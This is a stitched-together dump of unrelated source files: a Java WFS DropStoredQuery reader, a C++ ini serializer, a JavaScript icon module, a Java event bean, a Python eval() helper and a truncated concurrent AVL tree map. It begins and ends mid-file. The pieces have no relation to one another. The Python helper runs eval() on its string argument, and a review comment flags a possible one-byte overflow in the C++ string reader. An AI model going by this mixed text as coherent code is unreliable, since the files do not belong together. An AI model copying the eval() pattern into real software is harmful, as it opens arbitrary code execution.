        super(parameters, wfsConfig);
        baseRequestReader = new BaseRequestReader();
    }

    /**
     * Builds the DropStoredQuery request object from the KVP parameters.
     *
     * @throws WFSException with INVALID_PARAMETER_VALUE when the
     *         STOREDQUERY_ID value cannot be parsed
     */
    @Override
    public DropStoredQueryType readRequest() throws WFSException {
        DropStoredQueryType wfsRequest = new DropStoredQueryType();
        baseRequestReader.read(wfsRequest, parameters);
        try {
            if (parameters.containsKey(KVPConstants.STOREDQUERY_ID))
                wfsRequest.setId(new StringParser().parse(KVPConstants.STOREDQUERY_ID, parameters.get(KVPConstants.STOREDQUERY_ID)));
        } catch (KVPParseException e) {
            throw new WFSException(WFSExceptionCode.INVALID_PARAMETER_VALUE, e.getMessage(), e.getParameter(), e.getCause());
        }
        return wfsRequest;
    }

    @Override
    public String getOperationName() {
        return KVPConstants.DROP_STORED_QUERY;
    }
}
<filename>src/editors/LevelEditor/iniStreamImpl.cpp
#include "stdafx.h"
#pragma hdrstop
#include "iniStreamImpl.h"
// Produces the next sequential key name ("000001", "000002", ...). The
// counter makes key order significant: values must be read back in the same
// order they were written.
LPCSTR SIniFileStream::gen_name()
{
    ++counter;
    sprintf(tmp_buff,"%06d",counter);
    return tmp_buff;
}
// Each w_* writer stores a single value of the corresponding type under the
// next generated key of the current section.
void SIniFileStream::w_float( float a)
{
    ini->w_float(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_vec3( const Fvector& a)
{
    ini->w_fvector3(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_vec4( const Fvector4& a)
{
    ini->w_fvector4(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u64( u64 a)
{
    ini->w_u64(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s64( s64 a)
{
    ini->w_s64(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u32( u32 a)
{
    ini->w_u32(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s32( s32 a)
{
    ini->w_s32(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u16( u16 a)
{
    ini->w_u16(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s16( s16 a)
{
    ini->w_s16(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_u8( u8 a)
{
    ini->w_u8(sect.c_str(),gen_name(),a);
}
void SIniFileStream::w_s8( s8 a)
{
    ini->w_s8(sect.c_str(),gen_name(),a);
}
// Strings are stored wrapped in double quotes; a null pointer is stored as "".
void SIniFileStream::w_stringZ( LPCSTR S)
{
    string4096 buff;
    sprintf_s (buff, sizeof(buff),"\"%s\"",(S)?S:"");
    ini->w_string(sect.c_str(),gen_name(),buff);
//.	Msg("[%s] [%s]=[%s]",sect.c_str(),tmp_buff,buff);
}
// Each r_* reader fetches the value stored under the next generated key of
// the current section; reads must mirror the original write order.
void SIniFileStream::r_vec3(Fvector& A)
{
    A = ini->r_fvector3(sect.c_str(),gen_name());
}
void SIniFileStream::r_vec4(Fvector4& A)
{
    A = ini->r_fvector4(sect.c_str(),gen_name());
}
void SIniFileStream::r_float(float& A)
{
    A = ini->r_float(sect.c_str(),gen_name());
}
void SIniFileStream::r_u8(u8& A)
{
    A = ini->r_u8(sect.c_str(),gen_name());
}
void SIniFileStream::r_u16(u16& A)
{
    A = ini->r_u16(sect.c_str(),gen_name());
}
void SIniFileStream::r_u32(u32& A)
{
    A = ini->r_u32(sect.c_str(),gen_name());
}
void SIniFileStream::r_u64(u64& A)
{
    A = ini->r_u64(sect.c_str(),gen_name());
}
void SIniFileStream::r_s8(s8& A)
{
    A = ini->r_s8(sect.c_str(),gen_name());
}
void SIniFileStream::r_s16(s16& A)
{
    A = ini->r_s16(sect.c_str(),gen_name());
}
void SIniFileStream::r_s32(s32& A)
{
    A = ini->r_s32(sect.c_str(),gen_name());
}
void SIniFileStream::r_s64(s64& A)
{
    A = ini->r_s64(sect.c_str(),gen_name());
}
void SIniFileStream::r_string(LPSTR dest, u32 dest_size)
{
    shared_str S;
    S = ini->r_string_wb(sect.c_str(),gen_name());
    // NOTE(review): assumes shared_str::size() accounts for the terminator
    // relative to dest_size — confirm; if size() excludes the NUL, the case
    // dest_size == S.size() would pass the assert yet overflow by one byte.
    R_ASSERT(dest_size>=S.size());
    strcpy_s(dest, dest_size, S.c_str());
//.	Msg("[%s] [%s]=[%s]",sect.c_str(),tmp_buff,dest);
}
// Consumes (and discards) the next key so subsequent reads stay in sync.
void SIniFileStream::skip_stringZ()
{
    gen_name();
}
|
"use strict";

// Generated icon-data module: exports the "login" glyph as an SVG path
// description (viewBox + child path nodes) for an icon renderer.
Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.login = void 0;
var login = {
  "viewBox": "0 0 20 20",
  "children": [{
    "name": "path",
    "attribs": {
      "d": "M14,10L8,5v3H1v4h7v3L14,10z M17,17H9v2h8c1.1,0,2-0.9,2-2V3c0-1.1-0.9-2-2-2H9v2h8V17z"
    }
  }]
};
exports.login = login;
package wearable.hotelbeds.shared.event;
import java.io.Serializable;
import java.math.BigDecimal;
import java.util.Date;
/**
* Created by Zavierazo on 06/10/2015.
*/
public class EventInfoBean implements Serializable{
private String id;
private String name;
private Date timeStart;
private Date timeEnd;
private BigDecimal price;
private String imageUrl;
private String shortDescription;
public EventInfoBean() {
}
public EventInfoBean(String id, String name, Date timeStart, Date timeEnd, BigDecimal price, String imageUrl, String shortDescription) {
this.id = id;
this.name = name;
this.timeStart = timeStart;
this.timeEnd = timeEnd;
this.price = price;
this.imageUrl = imageUrl;
this.shortDescription = shortDescription;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Date getTimeStart() {
return timeStart;
}
public void setTimeStart(Date timeStart) {
this.timeStart = timeStart;
}
public Date getTimeEnd() {
return timeEnd;
}
public void setTimeEnd(Date timeEnd) {
this.timeEnd = timeEnd;
}
public String getId() {
return id;
}
public void setId(String id) {
this.id = id;
}
public BigDecimal getPrice() {
return price;
}
public void setPrice(BigDecimal price) {
this.price = price;
}
public String getImageUrl() {
return imageUrl;
}
public void setImageUrl(String imageUrl) {
this.imageUrl = imageUrl;
}
public String getShortDescription() {
return shortDescription;
}
public void setShortDescription(String shortDescription) {
this.shortDescription = shortDescription;
}
}
|
def evaluate_code(code_snippet):
    """Evaluate a Python expression string and return its value.

    On any exception the error is captured and returned as a string of the
    form ``"Error: <message>"`` instead of propagating.

    SECURITY NOTE(review): eval() executes arbitrary code — only ever call
    this with trusted input.
    """
    try:
        return eval(code_snippet)
    except Exception as exc:
        return f"Error: {exc}"
# Test cases
# (the error branch returns the exception's own message, prefixed "Error: ")
print(evaluate_code("True")) # Output: True
print(evaluate_code("2 + 3")) # Output: 5
print(evaluate_code("10 / 0")) # Output: Error: division by zero
/*
* Copyright (c) 2009 Stanford University, unless otherwise specified.
* All rights reserved.
*
* This software was developed by the Pervasive Parallelism Laboratory of
* Stanford University, California, USA.
*
* Permission to use, copy, modify, and distribute this software in source
* or binary form for any purpose with or without fee is hereby granted,
* provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3. Neither the name of Stanford University nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
package algorithms.snaptree;
import java.io.*;
import java.util.*;
import java.util.concurrent.ConcurrentNavigableMap;
// TODO: optimized buildFromSorted
// TODO: submap.clone()
/** A concurrent AVL tree with fast cloning, based on the algorithm of Bronson,
* Casper, Chafi, and Olukotun, "A Practical Concurrent Binary Search Tree"
* published in PPoPP'10. To simplify the locking protocols rebalancing work
* is performed in pieces, and some removed keys are be retained as routing
* nodes in the tree.
*
* <p>This data structure honors all of the contracts of {@link
* java.util.concurrent.ConcurrentSkipListMap}, with the additional contract
* that clone, size, toArray, and iteration are linearizable (atomic).
*
* <p>The tree uses optimistic concurrency control. No locks are usually
* required for get, containsKey, firstKey, firstEntry, lastKey, or lastEntry.
* Reads are not lock free (or even obstruction free), but obstructing threads
* perform no memory allocation, system calls, or loops, which seems to work
* okay in practice. All of the updates to the tree are performed in fixed-
* size blocks, so restoration of the AVL balance criteria may occur after a
* change to the tree has linearized (but before the mutating operation has
* returned). The tree is always properly balanced when quiescent.
*
* <p>To clone the tree (or produce a snapshot for consistent iteration) the
* root node is marked as shared, which must be (*) done while there are no
* pending mutations. New mutating operations are blocked if a mark is
* pending, and when existing mutating operations are completed the mark is
* made.
* <em>* - It would be less disruptive if we immediately marked the root as
* shared, and then waited for pending operations that might not have seen the
* mark without blocking new mutations. This could result in imbalance being
* frozen into the shared portion of the tree, though. To minimize the
* problem we perform the mark and reenable mutation on whichever thread
* notices that the entry count has become zero, to reduce context switches on
* the critical path.</em>
*
* <p>The same multi-cache line data structure required for efficiently
* tracking the entry and exit for mutating operations is used to maintain the
* current size of the tree. This means that the size can be computed by
* quiescing as for a clone, but without doing any marking.
*
* <p>Range queries such as higherKey are not amenable to the optimistic
* hand-over-hand locking scheme used for exact searches, so they are
* implemented with pessimistic concurrency control. Mutation can be
* considered to acquire a lock on the map in Intention-eXclusive mode, range
* queries, size(), and root marking acquire the lock in Shared mode.
*
* @author <NAME>
*/
public class SnapTreeMap<K,V> extends AbstractMap<K,V> implements ConcurrentNavigableMap<K,V>, Cloneable, Serializable {
private static final long serialVersionUID = 9052695062720473599L;
/** If false, null values will trigger a NullPointerException. When false,
* this map acts exactly like a ConcurrentSkipListMap, except for the
* running time of the methods. The ability to get a snapshot reduces the
* potential ambiguity between null values and absent entries, so I'm not
* sure what the default should be.
*/
static final boolean AllowNullValues = false;
/** This is a special value that indicates the presence of a null value,
* to differentiate from the absence of a value. Only used when
* {@link #AllowNullValues} is true.
*/
static final Object SpecialNull = new Object();
/** This is a special value that indicates that an optimistic read
* failed.
*/
static final Object SpecialRetry = new Object();
/** The number of spins before yielding. */
static final int SpinCount = Integer.parseInt(System.getProperty("snaptree.spin", "100"));
/** The number of yields before blocking. */
static final int YieldCount = Integer.parseInt(System.getProperty("snaptree.yield", "0"));
// we encode directions as characters
static final char Left = 'L';
static final char Right = 'R';
/** An <tt>OVL</tt> is a version number and lock used for optimistic
* concurrent control of some program invariant. If {@link #isShrinking}
* then the protected invariant is changing. If two reads of an OVL are
* performed that both see the same non-changing value, the reader may
* conclude that no changes to the protected invariant occurred between
* the two reads. The special value UnlinkedOVL is not changing, and is
* guaranteed to not result from a normal sequence of beginChange and
* endChange operations.
* <p>
* For convenience <tt>endChange(ovl) == endChange(beginChange(ovl))</tt>.
*/
static long beginChange(long ovl) { return ovl | 1; }
static long endChange(long ovl) { return (ovl | 3) + 1; }
static final long UnlinkedOVL = 2;
static boolean isShrinking(long ovl) { return (ovl & 1) != 0; }
static boolean isUnlinked(long ovl) { return (ovl & 2) != 0; }
static boolean isShrinkingOrUnlinked(long ovl) { return (ovl & 3) != 0L; }
private static class Node<K,V> implements Map.Entry<K,V> {
final K key;
volatile int height;
/** null means this node is conceptually not present in the map.
* SpecialNull means the value is null.
*/
volatile Object vOpt;
volatile Node<K,V> parent;
volatile long shrinkOVL;
volatile Node<K,V> left;
volatile Node<K,V> right;
Node(final K key,
final int height,
final Object vOpt,
final Node<K,V> parent,
final long shrinkOVL,
final Node<K,V> left,
final Node<K,V> right)
{
this.key = key;
this.height = height;
this.vOpt = vOpt;
this.parent = parent;
this.shrinkOVL = shrinkOVL;
this.left = left;
this.right = right;
}
@Override
public K getKey() { return key; }
@Override
@SuppressWarnings("unchecked")
public V getValue() {
final Object tmp = vOpt;
if (AllowNullValues) {
return tmp == SpecialNull ? null : (V)tmp;
} else {
return (V)tmp;
}
}
@Override
public V setValue(final V v) {
throw new UnsupportedOperationException();
}
Node<K,V> child(char dir) { return dir == Left ? left : right; }
void setChild(char dir, Node<K,V> node) {
if (dir == Left) {
left = node;
} else {
right = node;
}
}
//////// copy-on-write stuff
private static <K,V> boolean isShared(final Node<K,V> node) {
return node != null && node.parent == null;
}
static <K,V> Node<K,V> markShared(final Node<K,V> node) {
if (node != null) {
node.parent = null;
}
return node;
}
private Node<K,V> lazyCopy(Node<K,V> newParent) {
assert (isShared(this));
assert (!isShrinkingOrUnlinked(shrinkOVL));
return new Node<K,V>(key, height, vOpt, newParent, 0L, markShared(left), markShared(right));
}
Node<K,V> unsharedLeft() {
final Node<K,V> cl = left;
if (!isShared(cl)) {
return cl;
} else {
lazyCopyChildren();
return left;
}
}
Node<K,V> unsharedRight() {
final Node<K,V> cr = right;
if (!isShared(cr)) {
return cr;
} else {
lazyCopyChildren();
return right;
}
}
Node<K,V> unsharedChild(final char dir) {
return dir == Left ? unsharedLeft() : unsharedRight();
}
private synchronized void lazyCopyChildren() {
final Node<K,V> cl = left;
if (isShared(cl)) {
left = cl.lazyCopy(this);
}
final Node<K,V> cr = right;
if (isShared(cr)) {
right = cr.lazyCopy(this);
}
}
//////// per-node blocking
private void waitUntilShrinkCompleted(final long ovl) {
if (!isShrinking(ovl)) {
return;
}
for (int tries = 0; tries < SpinCount; ++tries) {
if (shrinkOVL != ovl) {
return;
}
}
for (int tries = 0; tries < YieldCount; ++tries) {
Thread.yield();
if (shrinkOVL != ovl) {
return;
}
}
// spin and yield failed, use the nuclear option
synchronized (this) {
// we can't have gotten the lock unless the shrink was over
}
assert(shrinkOVL != ovl);
}
int validatedHeight() {
final int hL = left == null ? 0 : left.validatedHeight();
final int hR = right == null ? 0 : right.validatedHeight();
assert(Math.abs(hL - hR) <= 1);
final int h = 1 + Math.max(hL, hR);
assert(h == height);
return height;
}
//////// SubMap.size() helper
static <K,V> int computeFrozenSize(Node<K,V> root,
Comparable<? super K> fromCmp,
boolean fromIncl,
final Comparable<? super K> toCmp,
final boolean toIncl) {
int result = 0;
while (true) {
if (root == null) {
return result;
}
if (fromCmp != null) {
final int c = fromCmp.compareTo(root.key);
if (c > 0 || (c == 0 && !fromIncl)) {
// all matching nodes are on the right side
root = root.right;
continue;
}
}
if (toCmp != null) {
final int c = toCmp.compareTo(root.key);
if (c < 0 || (c == 0 && !toIncl)) {
// all matching nodes are on the left side
root = root.left;
continue;
}
}
// Current node matches. Nodes on left no longer need toCmp, nodes
// on right no longer need fromCmp.
if (root.vOpt != null) {
++result;
}
result += computeFrozenSize(root.left, fromCmp, fromIncl, null, false);
fromCmp = null;
root = root.right;
}
}
//////// Map.Entry stuff
@Override
public boolean equals(final Object o) {
if (!(o instanceof Map.Entry)) {
return false;
}
final Map.Entry rhs = (Map.Entry)o;
return eq(key, rhs.getKey()) && eq(getValue(), rhs.getValue());
}
private static boolean eq(final Object o1, final Object o2) {
return o1 == null ? o2 == null : o1.equals(o2);
}
@Override
public int hashCode() {
return (key == null ? 0 : key.hashCode()) ^
(getValue() == null ? 0 : getValue().hashCode());
}
@Override
public String toString() {
return key + "=" + getValue();
}
}
    /** A dummy node that anchors the tree: the real root is always this
     * holder's right child, which simplifies locking at the top of the tree.
     */
    private static class RootHolder<K,V> extends Node<K,V> {
        RootHolder() {
            super(null, 1, null, null, 0L, null, null);
        }
        // Snapshot constructor: shares the snapshot's right child (the real
        // root), which the caller has already marked shared.
        RootHolder(final RootHolder<K,V> snapshot) {
            super(null, 1 + snapshot.height, null, null, 0L, null, snapshot.right);
        }
    }
    /** Copy-on-write manager specialization: freezing a tree marks the real
     * root (holder.right) as shared so that subsequent mutators lazily copy
     * nodes instead of modifying the snapshot.
     */
    private static class COWMgr<K,V> extends CopyOnWriteManager<RootHolder<K,V>> {
        COWMgr() {
            super(new RootHolder<K,V>(), 0);
        }
        COWMgr(final RootHolder<K,V> initialValue, final int initialSize) {
            super(initialValue, initialSize);
        }
        protected RootHolder<K,V> freezeAndClone(final RootHolder<K,V> value) {
            Node.markShared(value.right);
            return new RootHolder<K,V>(value);
        }
        protected RootHolder<K,V> cloneFrozen(final RootHolder<K,V> frozenValue) {
            return new RootHolder<K,V>(frozenValue);
        }
    }
//////// node access functions
private static int height(final Node<?,?> node) {
return node == null ? 0 : node.height;
}
@SuppressWarnings("unchecked")
private V decodeNull(final Object vOpt) {
assert (vOpt != SpecialRetry);
if (AllowNullValues) {
return vOpt == SpecialNull ? null : (V)vOpt;
} else {
return (V)vOpt;
}
}
private static Object encodeNull(final Object v) {
if (AllowNullValues) {
return v == null ? SpecialNull : v;
} else {
if (v == null) {
throw new NullPointerException();
}
return v;
}
}
//////////////// state
    // Optional ordering; null means the keys' natural ordering is used.
    private final Comparator<? super K> comparator;
    // Holder of the current tree root plus the epoch/size machinery;
    // replaced wholesale by clear() and clone().
    private transient volatile COWMgr<K,V> holderRef;

    //////////////// public interface

    /** Creates an empty map ordered by the keys' natural ordering. */
    public SnapTreeMap() {
        this.comparator = null;
        this.holderRef = new COWMgr<K,V>();
    }

    /** Creates an empty map ordered by <tt>comparator</tt>. */
    public SnapTreeMap(final Comparator<? super K> comparator) {
        this.comparator = comparator;
        this.holderRef = new COWMgr<K,V>();
    }

    /** Creates a map with natural ordering containing <tt>source</tt>'s entries. */
    public SnapTreeMap(final Map<? extends K, ? extends V> source) {
        this.comparator = null;
        this.holderRef = new COWMgr<K,V>();
        putAll(source);
    }

    /** Creates a map with the same ordering and contents as <tt>source</tt>;
     * copying another SnapTreeMap is O(1) via a shared snapshot.
     */
    public SnapTreeMap(final SortedMap<K,? extends V> source) {
        this.comparator = source.comparator();
        if (source instanceof SnapTreeMap) {
            final SnapTreeMap<K,V> s = (SnapTreeMap<K,V>) source;
            this.holderRef = (COWMgr<K,V>) s.holderRef.clone();
        }
        else {
            // TODO: take advantage of the sort order
            // for now we optimize only by bypassing the COWMgr
            int size = 0;
            final RootHolder<K,V> holder = new RootHolder<K,V>();
            for (Map.Entry<K,? extends V> e : source.entrySet()) {
                final K k = e.getKey();
                final V v = e.getValue();
                if (k == null) {
                    throw new NullPointerException("source map contained a null key");
                }
                if (!AllowNullValues && v == null) {
                    throw new NullPointerException("source map contained a null value");
                }
                // no other thread can see 'holder' yet, so no epoch ticket needed
                updateUnderRoot(k, comparable(k), UpdateAlways, null, encodeNull(v), holder);
                ++size;
            }
            this.holderRef = new COWMgr<K,V>(holder, size);
        }
    }
    /** Returns a snapshot copy of this map.
     * NOTE(review): presumably O(1) via COWMgr.clone() freezing and sharing
     * the current root (COWMgr.clone() is declared outside this chunk) —
     * confirm against CopyOnWriteManager.
     */
    @SuppressWarnings("unchecked")
    @Override
    public SnapTreeMap<K,V> clone() {
        final SnapTreeMap<K,V> copy;
        try {
            copy = (SnapTreeMap<K,V>) super.clone();
        } catch (final CloneNotSupportedException xx) {
            throw new InternalError();
        }
        assert(copy.comparator == comparator);
        copy.holderRef = (COWMgr<K,V>) holderRef.clone();
        return copy;
    }
    @Override
    public int size() {
        // size is tracked by the COW manager via epoch ticket deltas
        return holderRef.size();
    }

    @Override
    public boolean isEmpty() {
        // removed-but-not-unlinked nodes cannot be leaves, so if the tree is
        // truly empty then the root holder has no right child
        return holderRef.read().right == null;
    }

    @Override
    public void clear() {
        // swap in a fresh manager; concurrent readers keep the old tree
        holderRef = new COWMgr<K,V>();
    }

    @Override
    public Comparator<? super K> comparator() {
        return comparator;
    }

    @Override
    public boolean containsValue(final Object value) {
        // apply the same null policy as the rest of the code, but fall
        // back to the default implementation
        encodeNull(value);
        return super.containsValue(value);
    }

    //////// concurrent search

    @Override
    public boolean containsKey(final Object key) {
        // getImpl returns the internal encoding: null only when absent
        return getImpl(key) != null;
    }

    @Override
    public V get(final Object key) {
        return decodeNull(getImpl(key));
    }
@SuppressWarnings("unchecked")
private Comparable<? super K> comparable(final Object key) {
if (key == null) {
throw new NullPointerException();
}
if (comparator == null) {
return (Comparable<? super K>)key;
}
return new Comparable<K>() {
final Comparator<? super K> _cmp = comparator;
@SuppressWarnings("unchecked")
public int compareTo(final K rhs) { return _cmp.compare((K)key, rhs); }
};
}
    /** Returns either a value or SpecialNull, if present, or null, if absent.
     * Top of the hand-over-hand optimistic search: validates the root
     * holder's right child before recursing, retrying on any concurrent
     * shrink (rotation/unlink).
     */
    private Object getImpl(final Object key) {
        final Comparable<? super K> k = comparable(key);

        while (true) {
            final Node<K,V> right = holderRef.read().right;
            if (right == null) {
                return null;
            } else {
                final int rightCmp = k.compareTo(right.key);
                if (rightCmp == 0) {
                    // who cares how we got here
                    return right.vOpt;
                }

                final long ovl = right.shrinkOVL;
                if (isShrinkingOrUnlinked(ovl)) {
                    right.waitUntilShrinkCompleted(ovl);
                    // RETRY
                } else if (right == holderRef.read().right) {
                    // the reread of .right is the one protected by our read of ovl
                    final Object vo = attemptGet(k, right, (rightCmp < 0 ? Left : Right), ovl);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
    /** Recursive step of the optimistic lookup.  <tt>node</tt> was reached
     * while its OVL read <tt>nodeOVL</tt> was valid, and the search proceeds
     * toward direction <tt>dirToC</tt>.  Returns the node's vOpt encoding,
     * null if the key is absent, or SpecialRetry if the caller must restart
     * one level up because a shrink invalidated its traversal.
     */
    private Object attemptGet(final Comparable<? super K> k,
                              final Node<K,V> node,
                              final char dirToC,
                              final long nodeOVL) {
        while (true) {
            final Node<K,V> child = node.child(dirToC);

            if (child == null) {
                if (node.shrinkOVL != nodeOVL) {
                    return SpecialRetry;
                }

                // Node is not present.  Read of node.child occurred while
                // parent.child was valid, so we were not affected by any
                // shrinks.
                return null;
            } else {
                final int childCmp = k.compareTo(child.key);
                if (childCmp == 0) {
                    // how we got here is irrelevant
                    return child.vOpt;
                }

                // child is non-null
                final long childOVL = child.shrinkOVL;
                if (isShrinkingOrUnlinked(childOVL)) {
                    child.waitUntilShrinkCompleted(childOVL);

                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }
                    // else RETRY
                } else if (child != node.child(dirToC)) {
                    // this .child is the one that is protected by childOVL
                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }
                    // else RETRY
                } else {
                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }

                    // At this point we know that the traversal our parent took
                    // to get to node is still valid.  The recursive
                    // implementation will validate the traversal from node to
                    // child, so just prior to the nodeOVL validation both
                    // traversals were definitely okay.  This means that we are
                    // no longer vulnerable to node shrinks, and we don't need
                    // to validate nodeOVL any more.
                    final Object vo = attemptGet(k, child, (childCmp < 0 ? Left : Right), childOVL);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
@Override
public K firstKey() {
return extremeKeyOrThrow(Left);
}
@Override
@SuppressWarnings("unchecked")
public Map.Entry<K,V> firstEntry() {
return (SimpleImmutableEntry<K,V>) extreme(false, Left);
}
@Override
public K lastKey() {
return extremeKeyOrThrow(Right);
}
@SuppressWarnings("unchecked")
public Map.Entry<K,V> lastEntry() {
return (SimpleImmutableEntry<K,V>) extreme(false, Right);
}
private K extremeKeyOrThrow(final char dir) {
final K k = (K) extreme(true, dir);
if (k == null) {
throw new NoSuchElementException();
}
return k;
}
    /** Returns a key if returnKey is true, a SimpleImmutableEntry otherwise.
     * Returns null if none exists.
     * Concurrent search for the leftmost/rightmost present node, using the
     * same validate-then-recurse scheme as getImpl.
     */
    private Object extreme(final boolean returnKey, final char dir) {
        while (true) {
            final Node<K,V> right = holderRef.read().right;
            if (right == null) {
                return null;
            } else {
                final long ovl = right.shrinkOVL;
                if (isShrinkingOrUnlinked(ovl)) {
                    right.waitUntilShrinkCompleted(ovl);
                    // RETRY
                } else if (right == holderRef.read().right) {
                    // the reread of .right is the one protected by our read of ovl
                    final Object vo = attemptExtreme(returnKey, dir, right, ovl);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
    /** Recursive step of {@link #extreme}: walks toward <tt>dir</tt> until
     * the next child is null, validating each hop against the OVL under
     * which it was read.  Returns the key or entry, or SpecialRetry if the
     * caller must restart one level up.
     */
    private Object attemptExtreme(final boolean returnKey,
                                  final char dir,
                                  final Node<K,V> node,
                                  final long nodeOVL) {
        while (true) {
            final Node<K,V> child = node.child(dir);

            if (child == null) {
                // read of the value must be protected by the OVL, because we
                // must linearize against another thread that inserts a new min
                // key and then changes this key's value
                final Object vo = node.vOpt;

                if (node.shrinkOVL != nodeOVL) {
                    return SpecialRetry;
                }

                assert(vo != null);

                return returnKey ? node.key : new SimpleImmutableEntry<K,V>(node.key, decodeNull(vo));
            } else {
                // child is non-null
                final long childOVL = child.shrinkOVL;
                if (isShrinkingOrUnlinked(childOVL)) {
                    child.waitUntilShrinkCompleted(childOVL);

                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }
                    // else RETRY
                } else if (child != node.child(dir)) {
                    // this .child is the one that is protected by childOVL
                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }
                    // else RETRY
                } else {
                    if (node.shrinkOVL != nodeOVL) {
                        return SpecialRetry;
                    }

                    final Object vo = attemptExtreme(returnKey, dir, child, childOVL);
                    if (vo != SpecialRetry) {
                        return vo;
                    }
                    // else RETRY
                }
            }
        }
    }
//////////////// quiesced search
    // The eight NavigableMap neighbor queries all delegate to
    // boundedExtreme: a strict/inclusive bound on one side, the extreme in
    // the opposite direction, and a key-or-entry flag.

    @Override
    @SuppressWarnings("unchecked")
    public K lowerKey(final K key) {
        return (K) boundedExtreme(null, false, comparable(key), false, true, Right);
    }

    @Override
    @SuppressWarnings("unchecked")
    public K floorKey(final K key) {
        return (K) boundedExtreme(null, false, comparable(key), true, true, Right);
    }

    @Override
    @SuppressWarnings("unchecked")
    public K ceilingKey(final K key) {
        return (K) boundedExtreme(comparable(key), true, null, false, true, Left);
    }

    @Override
    @SuppressWarnings("unchecked")
    public K higherKey(final K key) {
        return (K) boundedExtreme(comparable(key), false, null, false, true, Left);
    }

    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> lowerEntry(final K key) {
        return (Entry<K,V>) boundedExtreme(null, false, comparable(key), false, false, Right);
    }

    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> floorEntry(final K key) {
        return (Entry<K,V>) boundedExtreme(null, false, comparable(key), true, false, Right);
    }

    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> ceilingEntry(final K key) {
        return (Entry<K,V>) boundedExtreme(comparable(key), true, null, false, false, Left);
    }

    @Override
    @SuppressWarnings("unchecked")
    public Entry<K,V> higherEntry(final K key) {
        return (Entry<K,V>) boundedExtreme(comparable(key), false, null, false, false, Left);
    }
    /** Returns the extreme key within the given bounds.  Unlike
     * boundedExtreme this never returns null: it throws
     * NoSuchElementException when no qualifying key exists.  (The previous
     * comment, "Returns null if none exists", described the wrong method.)
     */
    @SuppressWarnings("unchecked")
    private K boundedExtremeKeyOrThrow(final Comparable<? super K> minCmp,
                                       final boolean minIncl,
                                       final Comparable<? super K> maxCmp,
                                       final boolean maxIncl,
                                       final char dir) {
        final K k = (K) boundedExtreme(minCmp, minIncl, maxCmp, maxIncl, true, dir);
        if (k == null) {
            throw new NoSuchElementException();
        }
        return k;
    }
/** Returns null if none exists. */
@SuppressWarnings("unchecked")
private Object boundedExtreme(final Comparable<? super K> minCmp,
final boolean minIncl,
final Comparable<? super K> maxCmp,
final boolean maxIncl,
final boolean returnKey,
final char dir) {
K resultKey;
Object result;
if ((dir == Left && minCmp == null) || (dir == Right && maxCmp == null)) {
// no bound in the extreme direction, so use the concurrent search
result = extreme(returnKey, dir);
if (result == null) {
return null;
}
resultKey = returnKey ? (K) result : ((SimpleImmutableEntry<K,V>) result).getKey();
}
else {
RootHolder holder = holderRef.availableFrozen();
final Epoch.Ticket ticket;
if (holder == null) {
ticket = holderRef.beginQuiescent();
holder = holderRef.read();
}
else {
ticket = null;
}
try {
final Node<K,V> node = (dir == Left)
? boundedMin(holder.right, minCmp, minIncl)
: boundedMax(holder.right, maxCmp, maxIncl);
if (node == null) {
return null;
}
resultKey = node.key;
if (returnKey) {
result = node.key;
}
else if (ticket == null) {
// node of a frozen tree is okay, copy otherwise
result = node;
}
else {
// we must copy the node
result = new SimpleImmutableEntry<K,V>(node.key, node.getValue());
}
}
finally {
if (ticket != null) {
ticket.leave(0);
}
}
}
if (dir == Left && maxCmp != null) {
final int c = maxCmp.compareTo(resultKey);
if (c < 0 || (c == 0 && !maxIncl)) {
return null;
}
}
if (dir == Right && minCmp != null) {
final int c = minCmp.compareTo(resultKey);
if (c > 0 || (c == 0 && !minIncl)) {
return null;
}
}
return result;
}
private Node<K,V> boundedMin(Node<K,V> node,
final Comparable<? super K> minCmp,
final boolean minIncl) {
while (node != null) {
final int c = minCmp.compareTo(node.key);
if (c < 0) {
